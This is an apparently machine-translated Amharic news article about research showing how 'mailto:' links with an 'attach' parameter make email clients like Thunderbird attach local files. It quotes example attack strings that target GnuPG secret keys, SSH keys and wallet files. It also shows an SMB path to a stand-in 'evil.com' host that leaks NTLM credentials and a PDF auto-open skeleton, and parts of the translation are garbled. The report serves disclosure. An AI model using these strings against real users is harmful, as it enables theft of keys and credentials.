"mailto:" አገናኞችን በመጠቀም የኢሜይል ደንበኛ ተጠቃሚዎችን ማጥቃት

ተመራማሪዎች ከሩር ዩኒቨርሲቲ ቦኩም (ጀርመን) ተንትኗል (ፒዲኤፍ) “mailto:” አገናኞችን ከላቁ ግቤቶች ጋር ሲያቀናብሩ የደብዳቤ ደንበኞች ባህሪ። ከተመረመሩት ሃያ የኢሜል ደንበኞች ውስጥ አምስቱ የ"አባሪ" መለኪያን በመጠቀም የሃብት ምትክን ለሚጠቀም ጥቃት ተጋላጭ ናቸው። ተጨማሪ ስድስት የኢሜል ደንበኞች ለፒጂፒ እና ለኤስ/ኤምአይኤም ቁልፍ ምትክ ጥቃት የተጋለጡ ሲሆኑ ሶስት ደንበኞች የተመሰጠሩ መልዕክቶችን ለማውጣት ለጥቃት የተጋለጡ ነበሩ።

አገናኞች "ደብዳቤ ለ:"በአገናኙ ውስጥ ለተጠቀሰው አድራሻ ደብዳቤ ለመጻፍ የኢሜል ደንበኛን መክፈት በራስ-ሰር ለመስራት ያገለግላሉ። ከአድራሻው በተጨማሪ እንደ የደብዳቤው ርዕሰ ጉዳይ እና ለተለመደው ይዘት አብነት የመሳሰሉ ተጨማሪ መለኪያዎችን እንደ የአገናኝ አካል አድርገው መግለጽ ይችላሉ. የታቀደው ጥቃት ከተፈጠረው መልእክት ጋር አባሪ ለማያያዝ የሚያስችል የ "አባሪ" መለኪያን ያንቀሳቅሳል.

የደብዳቤ ደንበኞች ተንደርበርድ፣ GNOME ኢቮሉሽን (CVE-2020-11879)፣ KDE KMail (CVE-2020-11880)፣ IBM/HCL Notes (CVE-2020-4089) እና ፔጋሰስ ሜይል በራስ-ሰር እንዲያያይዙዎት ለሚያስችል ቀላል ያልሆነ ጥቃት ተጋላጭ ነበሩ። ማንኛውም የአካባቢ ፋይል፣ እንደ "mailto:?attach=path_to_file" ባለው አገናኝ በኩል የተገለጸ። ፋይሉ ማስጠንቀቂያ ሳያሳይ ተያይዟል, ስለዚህ ልዩ ትኩረት ከሌለ ተጠቃሚው ደብዳቤው ከአባሪ ጋር እንደሚላክ ላያስተውል ይችላል.

ለምሳሌ፣ እንደ “mailto:[ኢሜል የተጠበቀ]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" ከGnuPG ወደ ደብዳቤው ውስጥ የግል ቁልፎችን ማስገባት ትችላለህ። እንዲሁም የ crypto wallets (~/.bitcoin/wallet.dat)፣ SSH ቁልፎችን (~/.ssh/id_rsa) እና ለተጠቃሚው ተደራሽ የሆኑ ማናቸውንም ፋይሎች መላክ ይችላሉ። ከዚህም በላይ ተንደርበርድ እንደ "attach=/tmp/*.txt" ያሉ ግንባታዎችን በመጠቀም የፋይሎችን ቡድን በማስክ እንዲያያይዙ ይፈቅድልዎታል።

ከአካባቢያዊ ፋይሎች በተጨማሪ፣ አንዳንድ የኢሜይል ደንበኞች በIMAP አገልጋይ ውስጥ ወደ አውታረ መረብ ማከማቻ እና ዱካዎች አገናኞችን ያዘጋጃሉ። በተለይም IBM Notes እንደ "attach=\\evil.com\dummyfile" ያሉ አገናኞችን ሲያካሂዱ ፋይልን ከአውታረ መረብ ማውጫ እንዲያስተላልፉ ይፈቅድልዎታል እንዲሁም በአጥቂው ቁጥጥር ስር ወዳለው የኤስኤምቢ አገልጋይ አገናኝ በመላክ የ NTLM ማረጋገጫ መለኪያዎችን ያቋርጡ። (ጥያቄው አሁን ካለው የማረጋገጫ መለኪያዎች ተጠቃሚ ጋር ይላካል).

ተንደርበርድ እንደ “attach=imap:///fetch>UID>/INBOX>1/” ያሉ ጥያቄዎችን በተሳካ ሁኔታ ያስኬዳል፣ ይህም በIMAP አገልጋዩ ላይ ካሉ አቃፊዎች ይዘትን እንዲያያይዙ ያስችልዎታል። በተመሳሳይ ጊዜ ከIMAP የተገኙ መልእክቶች በOpenPGP እና S/MIME በኩል የተመሰጠሩ ከመላክዎ በፊት በደብዳቤ ደንበኛው በራስ ሰር ይፈታሉ። የተንደርበርድ ገንቢዎች ነበሩ። አሳውቋል በየካቲት እና በጉዳዩ ላይ ስላለው ችግር ተንደርበርድ 78 ችግሩ ቀድሞውኑ ተስተካክሏል (የተንደርበርድ ቅርንጫፎች 52, 60 እና 68 ተጋላጭ ናቸው).

የድሮው የተንደርበርድ ስሪቶች በተመራማሪዎቹ ለቀረቡላቸው በPGP እና S/MIME ላይ ለሌሎች ሁለት የጥቃት ልዩነቶች ተጋላጭ ነበሩ። በተለይም ተንደርበርድ፣እንዲሁም OutLook፣PostBox፣eM Client፣MailMate እና R2Mail2 ቁልፍ የመተኪያ ጥቃት ደርሶባቸዋል፣ይህም ምክኒያት የመልእክት ደንበኛው በኤስ/ኤምአይኤምኢ መልእክት ውስጥ የሚተላለፉ አዳዲስ ሰርተፍኬቶችን በራስ ሰር በማስመጣቱ እና በመጫኑ ነው። አጥቂው አስቀድሞ በተጠቃሚው የተከማቸ የህዝብ ቁልፎችን መተካት ለማደራጀት ነው።

ሁለተኛው ጥቃት፣ ተንደርበርድ፣ ፖስትቦክስ እና ሜይል ሜት የሚጋለጡበት፣ ረቂቅ መልዕክቶችን በራስ-ሰር የማዳን ዘዴን የሚጠቀም እና mailto መለኪያዎችን በመጠቀም ኢንክሪፕት የተደረጉ መልዕክቶችን መፍታት ወይም የዘፈቀደ መልዕክቶች ዲጂታል ፊርማ እንዲጨምር ያስችላል። ውጤቱን ወደ አጥቂው IMAP አገልጋይ ቀጣይ ማስተላለፍ። በዚህ ጥቃት, ምስጢራዊ ጽሑፉ በ "አካል" መለኪያ በኩል ይተላለፋል, እና "meta refresh" መለያ ወደ አጥቂው IMAP አገልጋይ ጥሪ ለመጀመር ጥቅም ላይ ይውላል. ለምሳሌ: ' '

ያለተጠቃሚ መስተጋብር "mailto:" አገናኞችን በራስ-ሰር ለማስኬድ በልዩ ሁኔታ የተነደፉ ፒዲኤፍ ሰነዶችን መጠቀም ይቻላል - በፒዲኤፍ ውስጥ ያለው የOpenAction ድርጊት ሰነድ ሲከፍቱ የመልእክት መቆጣጠሪያውን በራስ-ሰር እንዲያስጀምሩ ያስችልዎታል።

% ፒዲኤፍ-1.5
1 0 obj
<< /ዓይነት / ካታሎግ /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /ዓይነት / ድርጊት / ኤስ / URI / URI (mailto:?body=——የ PGP መልእክት ጀምር——[…])>>
endobj

"mailto:" አገናኞችን በመጠቀም የኢሜይል ደንበኛ ተጠቃሚዎችን ማጥቃት

ምንጭ: opennet.ru

አስተያየት ያክሉ